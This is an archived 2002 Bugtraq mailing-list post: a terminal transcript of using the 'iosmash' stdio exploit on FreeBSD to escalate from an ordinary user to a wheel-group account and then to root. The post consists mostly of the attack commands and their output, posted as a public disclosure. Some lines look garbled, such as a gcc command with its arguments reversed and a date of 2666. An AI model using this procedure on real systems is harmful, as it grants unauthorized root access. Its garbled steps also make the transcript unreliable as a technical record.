full info on iosmash.c as non wheel user
From: John Scimone (jscimone@cc.gatech.edu)Date: 04/24/02
- Previous message: Olaf Kirch: "Re: /lib/ld-2.2.4.so"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: John Scimone <jscimone@cc.gatech.edu> To: bugtraq@securityfocus.com Date: Tue, 23 Apr 2002 22:25:36 +0000
from phased....
I didnt think such would be necessary but due to the high volume of emails it
has proved so, below is a transcript of exploiting the stdio bug on freebsd as
a user not in the wheel group
Welcome to FreeBSD!
> id
uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
>
> grep wheel /etc/group
wheel:*:0:root,akt0r-root,misterx
>
> perl -pi -e 's/root /misterx /g' iosmash.c
> gcc -o iosmash.c iosmash
>./iosmash
Adding d0tslash:
<--- HIT CTRL-C --->
> grep 98 iosmash.c
s/key 98 snosoft2
98: MASS OAT ROLL TOOL AGO CAM
"\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666
01:02:0
3\n");
> su misterx
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel),
1006(cvsusers)
%cd ~
%grep "root " iosmash.c
decided to make a trivial exploit to easily get root :)
"\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
- Previous message: Olaf Kirch: "Re: /lib/ld-2.2.4.so"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
